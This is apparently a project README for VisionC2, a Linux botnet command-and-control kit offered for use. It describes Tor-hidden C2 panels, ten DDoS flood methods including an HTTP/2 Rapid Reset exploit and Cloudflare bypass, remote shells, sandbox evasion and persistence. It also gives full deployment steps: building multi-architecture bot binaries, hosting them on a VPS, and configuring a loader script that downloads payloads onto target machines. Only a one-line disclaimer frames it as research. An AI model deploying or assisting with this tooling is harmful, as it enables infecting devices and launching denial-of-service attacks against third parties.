TLS 1.3 + AES-256 encrypted C2 with Tor hidden service web panel, 10 DDoS attack vectors, remote shells, SOCKS5 proxy relay, and multi-arch bot binaries spanning 14 Linux architectures.
Video Showcasing Full Features + Installation
|
3 Control Interfaces Tor hidden service web panel accessible via Tor Browser with zero clearnet exposure. Interactive Go TUI or Telnet CLI. RBAC with 4 permission tiers. |
10 Attack Vectors L4: UDP/TCP/SYN/ACK/GRE/DNS floods. L7: HTTP/HTTPS request floods, Cloudflare bypass, HTTP/2 Rapid Reset (CVE-2023-44487). Proxy support on all L7 methods. |
|
Encrypted Transport TLS 1.3 over port 443 with AES-256-CTR config encryption. 6-layer C2 address obfuscation. HMAC registration with MD5 challenge-response. |
Stealth & Persistence 40+ VM/sandbox detection signatures, custom UPX packing, disguised process names. Persistence via systemd, cron watchdog, and rc.local. |
sudo apt update && apt install -y openssl git wget gcc python3 screen tor
# Install Go 1.24+
wget https://go.dev/dl/go1.24.1.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.24.1.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/binMinimum: 512MB RAM, 1GB storage, port 443 open Recommended: Ubuntu 22.04+, 2GB+ RAM
git clone https://github.com/Syn2Much/VisionC2.git && cd VisionC2
python3 setup.py # Select [1] Full SetupThe wizard prompts for C2 address, admin port (default 420), and TLS cert details. Outputs:
bins/— 14 bot binaries (multi-arch)cnc/certificates/— server.crt + server.keyserver— CNC binarysetup_config.txt— config summary
To change C2 address later: python3 setup.py → option [2]. Redeploy bots afterward.
./server # interactive launcher
./server --tui # TUI mode only
./server --split # Telnet mode on port 420
./server --daemon # Telnet headlessRun in background: screen -S vision ./server (detach with Ctrl+A, D).
┌─────────────┐ TLS 1.3 / 443 ┌─────────────┐
│ Operator │◄─── Tor Hidden Service ───►│ CNC Server │
│ (Browser / │ │ cnc/ │
│ TUI/Tel) │ └──────┬──────┘
└─────────────┘ │
TLS 1.3 / 443
│
┌────────────────────────┼────────────────────────┐
│ │ │
┌─────┴─────┐ ┌─────┴─────┐ ┌─────┴─────┐
│ Bot │ │ Bot │ │ Bot │
│ (arm64) │ │ (x86_64) │ │ (mips) │
└───────────┘ └───────────┘ └───────────┘
| Component | Path | Role |
|---|---|---|
| CNC | cnc/ |
C2 server — TLS listener on 443 for bots, embedded Tor service for web panel, TUI + Telnet CLI, RBAC via users.json |
| Bot | bot/ |
Agent binary — TLS 1.3 connection, config decoding, sandbox evasion, persistence install, shell access |
| Relay | relay/ |
SOCKS5 relay — bots connect via TLS, users connect on SOCKS5 port, disposable infrastructure |
| Tools | tools/ |
Build script, crypto utilities, cleanup helpers |
Host the compiled binaries on a separate VPS:
sudo apt install -y apache2
sudo cp bins/* /var/www/html/bins/
sudo systemctl start apache2Edit loader.sh line 3 with your server IP:
SRV="http://<your-server-ip>/bins"The loader auto-detects target architecture and downloads the matching binary from the 14 available variants.
| Method | Description |
|---|---|
| UDP Flood | High-volume 1024-byte payloads |
| TCP Flood | Connection table exhaustion |
| SYN Flood | Randomized source ports (raw TCP) |
| ACK Flood | ACK packet spam (raw TCP) |
| GRE Flood | Protocol 47, max payload |
| DNS Flood | Randomized query types, reflection |
| Method | Description |
|---|---|
| HTTP Flood | GET/POST with randomized headers + user-agents |
| HTTPS/TLS Flood | TLS handshake exhaustion + burst requests |
| CF Bypass | Cloudflare bypass via session/cookie reuse + fingerprinting |
| Rapid Reset | HTTP/2 exploit (CVE-2023-44487), HEADERS + RST_STREAM |
All L7 methods support HTTP + SOCKS5 proxy integration.
| Interface | Access | Use Case |
|---|---|---|
| Tor Web Panel | .onion address via Tor Browser |
Full GUI — attack builder, shell, bot management, SOCKS control, activity log |
| Go TUI | ./server --tui |
Interactive terminal dashboard with live bot feed |
| Telnet CLI | ./server --split (port 420) |
Lightweight remote access, scriptable |
| Document | Description |
|---|---|
ARCHITECTURE.md |
System design, encryption layers, protocol details |
CHANGELOG.md |
Full version history |
COMMANDS.md |
Complete command reference |
SETUP.md |
Installation and configuration guide |
PROXY.md |
SOCKS5 relay deployment |
"go: command not found" or wrong Go version
export PATH=$PATH:/usr/local/go/bin
go version # Should show 1.24+"Permission denied" when starting server on port 443
sudo setcap 'cap_net_bind_service=+ep' ./serverBots won't connect to C2
- Check firewall:
sudo ufw allow 443/tcp - Verify C2 address in
setup_config.txtmatches your server - Test TLS:
openssl s_client -connect YOUR_IP:443 - Check server logs for connection attempts
"No such file or directory" during build
sudo apt install -y build-essential gcc python3-devRelay server won't start
- Check if ports 9001/1080 are available:
netstat -tulpn | grep :9001 - Verify permissions:
chmod +x relay_server
For authorized security research and educational purposes only. Usage against targets without prior consent is illegal. Developer assumes no liability for misuse.
Syn2Much — hell@sinners.city | @synacket